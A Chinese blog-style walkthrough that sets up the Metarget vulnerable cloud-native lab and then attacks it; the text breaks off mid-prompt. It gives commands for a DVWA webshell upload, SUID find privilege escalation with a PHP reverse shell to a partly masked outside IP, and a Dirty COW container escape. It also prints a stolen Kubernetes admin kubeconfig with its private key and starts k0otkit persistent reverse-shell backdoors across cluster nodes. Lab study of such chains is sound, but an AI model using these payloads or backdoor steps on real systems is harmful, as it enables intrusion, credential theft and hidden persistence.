云原生攻防靶场-Metarget

Metarget目前仅支持在Ubuntu 16.04和18.04安装运行，在20.04上可能会遇到依赖项问题。安装步骤十分简单。
这里使用Ubuntu 18.04为例进行安装：

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt

然后执行以下命令，为系统安装带有CVE-2019-5736容器逃逸漏洞的Docker：

sudo ./metarget cnv install cve-2019-5736

接着执行以下命令，为系统安装带有CVE-2018-1002105权限提升漏洞的Kubernetes：

sudo ./metarget cnv install cve-2018-1002105 --domestic

集群部署成功后，最后执行以下命令，在当前集群上部署一个容器化DVWA：

sudo ./metarget appv install dvwa --external

整个交互过程如下：

ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2019-5736
cve-2019-5736 is going to be installed
uninstalling current docker gadgets if applicable
installing prerequisites
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
installing docker-ce with 18.03.1~ce~3-0~ubuntu version

cve-2019-5736 successfully installed

ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2018-1002105 --domestic
docker already installed
cve-2018-1002105 is going to be installed
uninstalling current kubernetes if applicable
pre-configuring
pre-installing
adding apt repository deb https://mirrors.aliyun.com/kubernetes/apt/ kubernetes-xenial main
installing kubernetes-cni with 0.7.5-00 version
installing kubectl with 1.11.10-00 version
installing kubelet with 1.11.10-00 version
installing kubeadm with 1.11.10-00 version
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-proxy-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-controller-manager-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-apiserver-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-scheduler-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/pause:3.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/etcd-amd64:3.2.18
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/coredns:1.1.3
running kubeadm
installing cni plugin
installing flannel
pulling quay.mirrors.ustc.edu.cn/coreos/flannel:v0.10.0-amd64
generating kubernetes worker script
kubernetes worker script generated at tools/install_k8s_worker.sh
cve-2018-1002105 successfully installed

ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget appv install dvwa --external
docker already installed
kubernetes already installed
dvwa is going to be installed
node port 30000 is allocated for service in vulns_app/dvwa/dvwa/dvwa-service.yaml
applying yamls/k8s_metarget_namespace.yaml
applying vulns_app/dvwa/dvwa/dvwa-deployment.yaml
applying data/dvwa-service.yaml
dvwa successfully installed

根据命令行输出的内容，我们可以直接在浏览器中访问到容器内的DVWA服务：

可以看到，只需要三行命令，我们就完成了一个多层次靶机环境的构建。
环境的清理也十分简单，只需依次执行以下命令即可：

./metarget appv remove dvwa
./metarget cnv remove cve-2018-1002105
./metarget cnv remove cve-2019-5736

参考：http://blog.nsfocus.net/metarget/
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw

使用admin/password登陆dvwa，直接使用文件上传来获取webshell。

上传冰蝎的shell连接获得webshell，可以看到当前权限为www-data权限。

接下来进行提权操作。

脏牛提权：Linux内核> = 2.6.22（2007年发行）开始就受影响了，直到2016年10月18日才修复。
查看发行版本
cat /etc/issue
cat /etc/*-release
查看内核版本信息
uname -a
SUID配置错误提权：
以下命令将尝试查找具有root权限的SUID的文件，不同系统适用于不同的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

这里我为了方便测试给环境中的find加了suid权限

通过命令查找设置了suid权限的可执行程序：

find / -perm -u=s -type f 2>/dev/null

find的-exec参数可以用来执行任意命令。因此我们可以使用添加了suid标识的find可执行程序以root身份执行命令来提权。我们尝试使用find来执行whomai命令。

find xxx -exec whoami \;

接着我们可以使用find来执行反弹shell命令，

find shell.php -exec php -r '$sock=fsockopen("42.xxx.xxx.97",8000);exec("/bin/sh -i <&3 >&3 2>&3");' \;

这里使用冰蝎执行反弹shell命令总是显示操作失败。


于是上传weevely的webshell，在weevely命令行中执行反弹shell成功了。

提权成功，获得了root权限的shell，但是这个shell并不是一个完全的root shell，它是一个euid为root，uid依旧是www-data的shell，也就是说我们只是获得了一个暂时的root shell。

容器探测：
测试过程中发现当前环境一些命令是没有，猜测当前环境可能是一个容器，通过查找.dockerenv文件和查看cgroup来判断当前我们是否在容器中。通过命令回显（kubepods）猜测我们当前处在在一个k8s的pod中。

ls -la / | grep dockerenv
cat /proc/1/cgroup

k8s、pod、容器之间的大概关系可以简单理解为：集群中包含多个pod，pod中包含多个容器。

容器逃逸：

CVE-2016-5195脏牛漏洞：
sudo apt install -y make gcc nasm
git clone https://github.com/scumjr/dirtycow-vdso
cd dirtycow-vdso
make

运行./0xdeadbeef attacker-ip:port
将获得宿主机的反弹shell，这里直接省略过程了，环境太卡老奔。
使用宿主机反弹回来的shell窃取Kubernetes管理员的访问凭据：

ls -al /root | grep kube
cat /root/.kube/config

# ls -al /root | grep kube
drwxr-xr-x  4 root   root   4096 Oct 31 20:26 .kube
# cat /root/.kube/config
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUN5RENDQWJDZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeE1UQXpNVEV5TWpZd01Wb1hEVE14TVRBeU9URXlNall3TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTGdtCm12UlcwMWpHK2FFOEVwZU5TUTZWQmxFV3p2dmR3YllWK2MrQ0laNmJEMk9DSkY2MnFLeEdTMUMrV1lDWFdYanQKeGZwYXZ2amVmZitNb1FuU2g5R0dXZ1dTQm9pUmFTdnlJazJYTVFqcUo5YnJwTVBPRDY0MTY4cEhMTTRtWE9pagozZ0plL0pOV1VkOFVhK0dYOWhNODVWeFdPSFF1V3lQR3hlVlg0cnMrU3UyOUpKcHhGdWswNG5uTGFUMklqV05RCkl0UElLTjcxSGpEcUQ1NmMrTjdVQlU3ZExLakw3SlhlUXIwUXoxZndraWllM1BzSEdybVhsQktGQWZ4Z1RKbDMKUlEyZ3lmdXVkbE1yN2dkMVRjT3M0bHVoNXFMS2ZOa1JXenV3RkRkamRPVWFsb1MzN0V4VWZ4d0lMN013ZGt6RApaR0ZiVHo2cGhhWHhPRENtcVQ4Q0F3RUFBYU1qTUNFd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFGeSt6a1I5bDlWRXN4UERJMDlmMFhXOWZFMXAKVUQ1Y3NRd2FOVCthSEVkYlBVcXZ5b0l3c21YcWF6Z0Zud1ZneVNwZHpLOG1zd0NJa3JsV1hOdEtzRHFhOTA0UwpTWjVyelAwM213bysyNUxkM2dyd2Jla3FQQkIvdmFqUk5KWjUzQWZybTQ3Zm5hQ3BGcUwxc0ZpcUk1K0pVTzk1CjM4eVlnalI2Tm54UVVoMlh5UDVDWkVFNVVabFgrV3lwZVVQZkEvSzUrTGpzRWI2cy9MaGJCUFFVMmtBaGtRVjAKYnhZaTlzQk5pVDdvV3U4MzRCUVBHeTFtVnBZQTF5NHRmd1Fod1lrV0NTd0lsaDZnZ1hYVkkvRW82bkpjNTNnZwpReHpKNG15ZmhQdVRrN3RoY3J5SXFMQXVhZjdkZ1JMVUw5aHV5c1VwNmkzR2dzTUNCalJVOEovQnJLST0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    server: https://10.0.8.10:6443
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: kubernetes-admin
  name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}
users:
- name: kubernetes-admin
  user:
    client-certificate-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM4akNDQWRxZ0F3SUJBZ0lJYUF4bHVNNjFpUXN3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TVRFd016RXhNakkyTURGYUZ3MHlNakV3TXpFeE1qSTJNRFZhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTIwQ1ZaOHBVY1I3Y3ZTTkkKMzh6dEwrUVNYLzdQSWo5aWdWUFpLN2hKYzdxNlQ5aFBkQS9zODlZb3VUUmlnWFpUQVFSU3BTM3h5TzZNaGR0NAp5cDh4eFlzUzlIbStldnk4Szd0YW4yMUFHN1ZDQVdrMWNvdU5rZGdYUTVBRTJMWHVURUJzc2tLQWVxOVlyQ25nCm8ySVZCZ0U1RzlRNm9oUnlLaU1sOG80T1JScko4ZURISTcra05iV3FKYytSMmJrN3NOWXNsSGpZc0hKR1ZJQ2sKNmNtZElDTUt0aXBtcURZMzVhRldrRE1WdUlTVUd6NTNiVmJYc2xQMkkxcEpjQm1HWERFM28yMWlzNjNjYmJ2ZApuNW5nbE15YXVUa3EzR251ZGdUc0NnR2puTmZZMTVLNGxuZGU3WDN2Z21lYW14eGVxSWhMYkpOTXgwa2poN0JsCkNzVmJEd0lEQVFBQm95Y3dKVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFIYkxQQzRNTnZUWjFJRG4xbXdJTWNVV3BiSjlaU3ZRT29GSQpxYmRTMk43UDFvQnJjcEkxOUtBdVZndHpLVkJmV3JaT1BrRW4xRDdERFRkdWJTbngrdiswcXRqeStMUDdUQ094Ck5aN0J6U0RYclVqRHJUTEc5bk1yUWRUM0ZvZ1NkU09QenV3bC9vRlBvTWVyVkIyTndlR3hEUEVsclVkcXduMzgKOUdFc2p5MnZuc3RROVIrSGs0aldaQ1BZN01zaUdsQUN4TGxrZWYrV2VoQ2hNMHJrKzBoSURlTjNvOGhseU1QWApBMHh5aVJFb3drS2txMU1rUTU2SVllMnVsUElPdFg5Y1NFeUdnbDgvV0ZpdUlGMDA4Z000THMzOCs0T3FjQnNkCmx6K2VZcDl0dWlYZ1ZOSkpUb2hndWRTRUVjdW8vVFlLcU1jU1c0REFiWEp3M1VKbURERT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    client-key-data: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcFFJQkFBS0NBUUVBMjBDVlo4cFVjUjdjdlNOSTM4enRMK1FTWC83UElqOWlnVlBaSzdoSmM3cTZUOWhQCmRBL3M4OVlvdVRSaWdYWlRBUVJTcFMzeHlPNk1oZHQ0eXA4eHhZc1M5SG0rZXZ5OEs3dGFuMjFBRzdWQ0FXazEKY291TmtkZ1hRNUFFMkxYdVRFQnNza0tBZXE5WXJDbmdvMklWQmdFNUc5UTZvaFJ5S2lNbDhvNE9SUnJKOGVESApJNytrTmJXcUpjK1IyYms3c05Zc2xIallzSEpHVklDazZjbWRJQ01LdGlwbXFEWTM1YUZXa0RNVnVJU1VHejUzCmJWYlhzbFAySTFwSmNCbUdYREUzbzIxaXM2M2NiYnZkbjVuZ2xNeWF1VGtxM0dudWRnVHNDZ0dqbk5mWTE1SzQKbG5kZTdYM3ZnbWVhbXh4ZXFJaExiSk5NeDBramg3QmxDc1ZiRHdJREFRQUJBb0lCQVFDMnFOU1A5cEZvK0tRLwo4cEI0MnhwVGhyZ0VQNTNEVTNrMmMydC9ML1lKczJ3YXJ3UnFsZ1g3a3RTMGp6N3R5bTBXY01xRmtJUlp1TnRiCmZWL2h0c1RaWmFieUJDYzhBU2luYWx2eWJDczNxa2VHTTJkeXVXN0ZMWGtjTVhUSU1yR0gxemgzUGs0Wlo5SUIKQkphQXAyc0thS1J5V2RwTFE2dGxEWWxFelRKNFFIQkRxOHNhUlNKSDlEWTVYMlFybGdnTldOS3FyZU45Q2wzeQo1ZGtyY0ZBVEl0Tjg0SVdiUVpCOEMrbktzZjlxMGdtWmVSSE5TaWxRUG1KVkhxZ0NqSkQ3YUFUWlQvUFRpSURnCi9IU240UVJXU3NITWRwTHozYThLMG1KVUNoeWhuVTVsN0NSdndoeVJPdlJEeE1yV25rRWVuMjBtREFOWUJ0eTEKdWMrdjBsRGhBb0dCQU50RGFqbk5Ba3VFeTNOQ2RPY05iZGhVV3dTcmxJa3JDZElhdkR0cU1PMi9KejdPNkRRegppNGswUkNydytJaUEwaHcwUWcwRnVyRk5BRHFDdjlqWi9LQkt1d3VRdXVIK1FULzlqSng2cy9sWHRualJBTmJ4CmN0TFFLMU5YbWhTODVxQlVadUdGT0w2MjM5c3Q4OWpNcitGeHhRZzFPdXFsQ3VBeFVzOElZcnZ4QW9HQkFQLzgKc2IwdjROb0Q1ZitYVm12Y2Zqd0MrN0ZVVW5aU0daU0tCVDlmbnlobHhxTXU0UDlZVEpKSDdBSTJoQ3M2aUJ6egozT0RCaDlYb083RHJyZVc4OEFRRDZBOXJMSytOTUUva2RFUFBlY0cybUM3dm9aUVhKaHpxaDB5V1lmSitLZTBiCmJqaXlVc3BnbytDR2dRMHJ5M09DUWhScE80cUc2TWVDaWxRZXpJYi9Bb0dCQUp2eGw1UmlkWFptalJoOXRJMDgKSk5yT0xDbm5LbTVnV016QXpRMW8ya0hOU1VsSGVTamZYQ2VLTDgxbXN5ektpaVViR2JzUFR4ZVl6MGZPQkVwagp4MlB0b3BoNEtDSmhaZUR3SU5pT0FJQ2ZYSjBTOFFqdWtwN1RCVzF5Q1pra1BOYmRFSXJtNkZQajF0U1pHeXdmCmNCdmtnYUR6MHVKZDNaMVVGelErSDVMUkFvR0JBS2F3TWtEQ0U0V0RjbG9iZnIvZnBTZUl2Y0k3NlRKNHhZVnUKMW5uczF5T2tHbE9hTEJLNXVhcXJRS2cwUFo0MGovdGlaRnJLU3B4a2k3SHAxYU82Z3dQcVUwcnUrL3NZVWZSRQpDOTA0RmMycEM3SE1nb2QvQjJkZTVGbGZ0MG9ERTJQOUw2bWxuTG1CY2xTNjRQL2xtNmFNbEdEY0lWUlVBdklmCk05b1E4QmViQW9HQVA4UTNxakNUY3R6aStDRWdOWkIxUUVFblA2ZjdvVVlBYllJSzluc24vSWhJUE8wSEloUWIKTVk2K01BVGJOTWo1eU8zK3N6UUVpaklCdmFVVE9nd1luZUg0NEYxUXlaZmFWbU1DOVFLMFhoSUhUZ0pwdjJMcwo5aGM0VlVLaTN3eVhUaDhxRkkrYjFpV0trb2h1YkloWkhta3BFOURlMnVETXBxMEl4cTA5Q2hBPQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

将以上凭据保存在本地kubeconfig文件，然后尝试用凭据 连接并查看Kubernetes集群:

kubectl --kubeconfig ./kubeconfig get nodes
kubectl --kubeconfig ./kubeconfig get pods

控制集群+权限维持：
k0otkit允许我们在取得集群Master节点控制权限后，快速在集群所有节点上创建隐蔽、持久的反弹shell后⻔。克隆Github仓库到攻击者自己的Linux服务器(k0otkit依赖于Metasploit，服务器上需要存在msfvenom和 msfconsole两个工具)，修改攻击者IP，然后执行pre_exp.sh:

git clone https://github.com/brant-ruan/k0otkit cd k0otkit
chmod u+x ./*.sh
# 修改pre_exp.sh中的ATTACKER_IP变量为实际攻击者IP 
./pre_exp.sh

脚本执行完成后，目录下新产生了一个k0otkit.sh文件，后面会用到。 接下来，执行handle_multi_reverse_shell.sh脚本，该脚本将打开msfconsole并运行一个反弹shell监听模块:

┌──(root